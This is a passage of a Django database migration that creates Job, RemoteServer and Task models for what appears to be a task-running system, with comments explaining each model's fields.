            ],
        ),
        # Background job keyed by a caller-supplied string id; `date` is a
        # 12-char string rather than a DateField.
        migrations.CreateModel(
            name='Job',
            fields=[
                ('id', models.CharField(max_length=100, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=300)),
                ('date', models.CharField(max_length=12)),
            ],
        ),
        # Known remote server: unique name, URL, and an enabled flag
        # (disabled by default).
        migrations.CreateModel(
            name='RemoteServer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, unique=True)),
                ('url', models.CharField(max_length=300)),
                ('enabled', models.BooleanField(default=0)),
            ],
        ),
        # Step of a job (keyed by `job_id`); `depend` presumably lists the
        # ids of prerequisite tasks -- confirm against the task runner.
        migrations.CreateModel(
            name='Task',
            fields=[
                ('job_id', models.CharField(max_length=100)),
                ('id', models.CharField(max_length=300, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=300)),
                ('command', models.TextField(default=b'')),
                ('function', models.TextField(default=b'')),
                ('params', models.TextField(default=b'')),
                ('depend', models.TextField(default=b'')),
                ('status', models.CharField(max_length=100)),
            ],
        ),
    ]
| 0 | 2,476 | 23 |